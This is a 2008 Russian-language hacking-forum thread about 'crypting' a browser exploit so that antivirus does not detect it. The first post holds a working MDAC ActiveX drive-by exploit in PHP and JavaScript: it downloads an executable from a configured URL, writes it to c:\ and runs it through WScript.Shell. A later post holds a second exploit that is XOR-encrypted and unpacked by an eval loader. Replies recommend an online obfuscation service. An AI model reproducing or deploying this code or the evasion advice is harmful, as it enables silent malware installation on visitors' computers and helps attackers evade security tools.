Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.03.2008, 20:56
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Крипт Сплойта
Все доброго времени суток .
Возможно эта тема поднималась , но все же ...
Каким образом криптуется сплойт , если можно , пример .. Вот код сплойта , как его спрятать от антивируса и сохранить его работоспособность , пробовал обфускацию - от антивируса не спасает .
Спасибо ...
PHP код:
<?
$clsid = "'{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'";
?>
<script language="JavaScript">
<? // mdac + ?>
function <?=$var[1];?>(<?=$var[7];?>)
{
var <?=$var[2];?> = "abcdefghiklmnopqrstuvwxyz";
var <?=$var[3];?> = <?=$var[7];?>;
var <?=$var[4];?> = '';
for (var i=0; i<<?=$var[3];?>; i++)
{
var <?=$var[5];?> = Math.floor(Math.random() * <?=$var[2];?>.length);
<?=$var[4];?> += <?=$var[2];?>.substring(<?=$var[5];?>,<?=$var[5];?>+1);
}
return <?=$var[4];?>;
}
function <?=$var[6];?>(CLSID, name)
{
var result = null;
try { eval('result = CLSID.CreateObject(name)') } catch(e){}
if (! result) { try { eval('result = CLSID.CreateObject(name, "")') } catch(e){} }
if (! result) { try { eval('result = CLSID.CreateObject(name, "", "")') } catch(e){} }
if (! result) { try { eval('result = CLSID.GetObject("", name)') } catch(e){} }
if (! result) { try { eval('result = CLSID.GetObject(name, "")') } catch(e){} }
if (! result) { try { eval('result = CLSID.GetObject(name)') } catch(e){} }
return(result);
}
function <?=$var[8];?>(xml, url)
{
try
{
xml.open("GET", url, false);
xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
function <?=$var[9];?>(o, name, data)
{
try
{
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }
return 1;
}
function <?=$var[10];?>(exec, name, type)
{
if (type == 0)
{
try { exec.Run(name, 0); return 1; } catch(e) { }
}
else
{
try { exe.<?=$var[10];?>(name); return 1; } catch(e) { }
}
return(0);
}
function mdac()
{
var <?=$var[11];?> = "<?=$ie_path;?>";
var <?=$var[12];?> = new Array(<?=$clsid;?>, null);
var <?=$var[13];?> = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
while (<?=$var[12];?>[i] && (! <?=$var[13];?>[0] || ! <?=$var[13];?>[1] || ! <?=$var[13];?>[2]) )
{
var a = null;
try
{
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + <?=$var[12];?>[i].substring(1, <?=$var[12];?>[i].length - 1));
} catch(e) { a = null; }
if (a)
{
if (! <?=$var[13];?>[0])
{
<?=$var[13];?>[0] = <?=$var[6];?>(a, "ms"+"xml2.XM"+"LHTTP");
if (! <?=$var[13];?>[0]) <?=$var[13];?>[0] = <?=$var[6];?>(a, "Micr"+"osoft.X"+"MLHTTP");
if (! <?=$var[13];?>[0]) <?=$var[13];?>[0] = <?=$var[6];?>(a, "MSX"+"ML2.Serv"+"erXML"+"HTTP");
}
if (! <?=$var[13];?>[1])
{
<?=$var[13];?>[1] = <?=$var[6];?>(a, "ADO"+"DB.St"+"ream");
}
if (! <?=$var[13];?>[2])
{
<?=$var[13];?>[2] = <?=$var[6];?>(a, "WSc"+"ript.Sh"+"ell");
if (! <?=$var[13];?>[2])
{
<?=$var[13];?>[2] = <?=$var[6];?>(a, "Sh"+"ell.Appli"+"cation");
if (<?=$var[13];?>[2]) n=1;
}
}
}
i++;
}
if (<?=$var[13];?>[0] && <?=$var[13];?>[1] && <?=$var[13];?>[2])
{
var data = <?=$var[8];?>(<?=$var[13];?>[0], <?=$var[11];?>);
if (data != 0)
{
var name = "c:\\"+<?=$var[1];?>(4)+".exe";
if (<?=$var[9];?>(<?=$var[13];?>[1], name, data) == 1)
{
if (<?=$var[10];?>(<?=$var[13];?>[2], name, n) == 1) { ret=1; }
}
}
}
return ret;
}
<? // mdac - ?>
function Attack()
{
mdac();
}
Attack();
</script>
|
|
|
13.03.2008, 21:01
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
http://iframe.in/
|
|
|
|
13.03.2008, 21:16
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Вставляю код , нажимаю generate но в ответ ничего не получаю ...
|
|
|
|
13.03.2008, 21:21
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Надо справа выбрать JavaScript Encoder
|
|
|
|
13.03.2008, 21:33
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
дык выбрал...  |
|
|
|
13.03.2008, 22:13
|
|
Постоянный
Регистрация: 19.10.2007
Сообщений: 794
Провел на форуме:
1013791
Репутация:
711
|
|
Сообщение от Xszz
дык выбрал... все верно вам написали. выбор сделать надо
Choose method: JavaScript Encoder
Затем в поле слева вставить свой скрипт и нажать кнопку Generate
Помигает полоска, мол что-то делается. Затем появятся ниже варианты обфусцированного кода. Попробуйте еще раз. Не пойму в чем проблема у вас? Банальный вопрос - поддержку javascript в браузере случаем не отключали?
|
|
|
|
13.03.2008, 22:13
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
PHP код:
<?
$key_that_script_is_crypted=46;
$resource_crypted_code ='#$
[\B����FZZ^����
q}k|xk|u�fzz~qfa}z�s ]Z\q\K^BOMK���rr��������JG\@OCK��
q}k|xk|u�~f~q}kbh�s�� ��BAOJ ^F^��#$H[@MZGA@�K@MAJK��
MA@ZK@Z��U#$[t3]
]Z\���Z\GC��]Z\G^qZOI]��
MA@ZK@Z���#$[t3]
@KY������#$[t3]HA\��
G������
G���]Z\BK@��
]Z\���
G�����
@KY� ��MF\��A\J��
]Z\u
Gs��p����#$[t3]\KZ[\@� �]M\G^Z�BO@I[OIK�dOXO}M\G^Z�]Z\����
@KY ��]Z\�������HA\��G������G���]Z\ BK@IZF��G�����U�]Z\����]Z\����}Z\G@I H\ACmFO\mAJK��]Z\ MFO\mAJKoZ��G��p�����S��KXOB��]Z\�����]M\G^Z� �#$S#$GH��
DOXO����Z\[K��KMFA� �O^^BKZ�O\MFGXK��DOXO ^F^��MAJK��lOOOOlOO MBO]]��YGJZF����FKGIFZ����^O\OC�@OCK��[\B��XOB[K��
[\B ����O^^BKZ� �#$KB]KGH��
L\AY]K\�����c}gk���KMFA� �FZCB��FKOJ��CKZO�fzz~�k{gx��|kh|k}f��MA@ZK@Z�����{|b�G@JKV ^F^������ K@MAJK�� �]M\G^Z�BO@I[OIK��dOXO}M\G^Z��#$]ZO\Z���#$H[@MZGA@�]ZO\Z���U#$XO\�@KYI���JAM[CK@Z M\KOZKkBKCK@Z�r ALDKMZr ��#$@KYI ]KZoZZ\GL[ZK�r GJr �r @KYIr ��#$@KYI ]KZoZZ\GL[ZK�r MBO]]GJr �r MBr �r ]Gr ��J�lj�����m���r �����o���r ���j������r �o���r ��m����r hm�r ���k��r ��r ��#$Z\W�U#$XO\�_���@KYI m\KOZKaLDKMZ�r C]r ��VC��r B�r �� ��r vcr ��bf��r zr �r z~r �r r ��#$XO\�]���@KYI m\KOZKaLDKMZ��}FKB���B o^���^B���GMOZG���A@��r r ��#$XO\�Z���@KYI m\KOZKaLDKMZ�r OJr �r AJr ��L ��r ]Zr ��\K��r OCr �r r ��#$Z\W�U�Z ZW^K�����#$_ A^K@�r ir ��k��r zr �r
[\B r �HOB]K��#$_ ]K@J����Z A^K@���#$Z y\GZK�_ \K]^A@]KlAJW��#$XO\�@OCK���r �� ��GKV^BA\K\ KVKr �#$Z }OXKzAhGBK�@OCK����#$Z mBA]K���#$S�MOZMF�K��US#$Z\W�U�] ]FKBBKVKM[ZK�@OCK���S�MOZMF�K��USS#$MOZMF�K�USS#$��]M\G^Z� � ���FKOJ���FZCB���#$KB]KGH��
L\AY]K\�����a^K\O���KMFA�K@MAJK�� �]M\G^Z�BO@I[OIK��dOXO}M\G^Z��#$LBO@EqGH\OCK���JAM[CK@Z M\KOZKkBKCK@Z�r GH\OCKr ��#$LBO@EqGH\OCK ]\M���r OLA[Z�LBO@Er �#$LBO@EqGH\OCK ]KZoZZ\GL[ZK�r GJr ��r LBO@EqGH\OCKqYG@JAYr ��#$LBO@EqGH\OCK ]KZoZZ\GL[ZK�r ]ZWBKr ��r JG]^BOW�@A@Kr ��#$JAM[CK@Z O^^K@JmFGBJ�LBO@EqGH\OCK��#$LBO@EqGH\OCKqYG@JAY KXOB���MA@HGIqGH\OCK���JAM[CK@Z M\KOZKkBKCK@Z�r GH\OCKr ��r#$MA@HGIqGH\OCK ]KZoZZ\GL[ZK�r GJr ��r MA@HGIqGH\OCKqYG@JAYr ��r#$MA@HGIqGH\OCK ]\M���r A^K\O�MA@HGIr �r#$JAM[CK@Z O^^K@JmFGBJ�MA@HGIqGH\OCK��r#$O^^qGH\OCK���JAM[CK@Z M\KOZKkBKCK@Z�r ]M\G^Zr ��r#$MOMFKqGH\OCK���JAM[CK@Z M\KOZKkBKCK@Z�r GH\OCKr ��r#$O^^qGH\OCK ]\M���r ��^F^�KMFA�
[\B����r �r#$O^^qGH\OCK A@BAOJ���H[@MZGA@���r#$Ur#$MOMFKqGH\OCK ]\M���r A^K\O�MOMFKr �r#$MOMFKqGH\OCK A@BAOJ���H[@MZGA@���r#$Ur#$MOMFK���MOMFKqGH\OCK MA@ZK@ZjAM[CK@Z MFGBJ`AJK]u�s G@@K\fzcb ZA{^^K\mO]K���r#$XO\�\K���@KY�|KIkV^�r �a~|rrrrYU�S kvk���zj�rrrr]��zj�rrrrJ���zj�rrrr]��zj��o�f|kh�r�r �O^^qGH\OCK ]\M ZA{^^K\mO]K����r r ��r#$HGBK@OCK���MOMFK COZMF�\K��r#$MA@HGIqGH\OCKqYG@JAY KXOBr#$�r�r#$A^K\O ]KZ~\KHK\K@MK�r `KZYA\Er �r z`�����o^^r �A^K\O IKZ~\KHK\K@MK�r {]K\�~\KH]r �r mOMFK�jG\KMZA\W�r ��^O\K@Z HGBK@OCKu�s��r#$O^^qBG@E���JAM[CK@Z M\KOZKkBKCK@Z�r Or ��r#$O^^qBG@E ]KZoZZ\GL[ZK�r F\KHr ��r Z@�������@AZFG@Ir ��r#$O^^qBG@E MBGME���r#$]KZzGCKA[Z�H[@MZGA@����UA^K\O ]KZ~\KHK\K@MK�r `KZYA\Er �r z`�����o^^r �r ZKB@KZ KVKr �S�������r#$r���r#$S�r#$JAM[CK@Z O^^K@JmFGBJ�MOMFKqGH\OCK��r#$S�r#$JAM[CK@Z O^^K@JmFGBJ�O^^qGH\OCK�����#$��]M\G^Z� ��#$';
$string_output=str_replace("[t1]", "<?", $resource_crypted_code);
$string_output=str_replace("[t3]", "'", $string_output);
$lenth_of_crypted_code=strlen($string_output);
$eval_php_code='';
for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
$eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
eval($eval_php_code);
?>
Вот хотелось бы услышать как закрипчен вот этот сплойт ?
Спасибо . |
|
|
|
13.03.2008, 22:22
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
2neprovad
А вы попробуйте код из первого поста вставить ...
|
|
|
|
13.03.2008, 22:37
|
|
Постоянный
Регистрация: 19.10.2007
Сообщений: 794
Провел на форуме:
1013791
Репутация:
711
|
|
в предыдущему посту с применением php - код зашифрован с применением операции xor.
код из первого поста вставлял, криптованый код получал, на работоспособность не проверял, так как такой цели не было. но факт что криптор все же работает и выдает результат
Последний раз редактировалось neprovad; 13.03.2008 в 22:43..
|
|
|
|
15.03.2008, 21:25
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Как можно декриптить этот код , с примением Xor ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
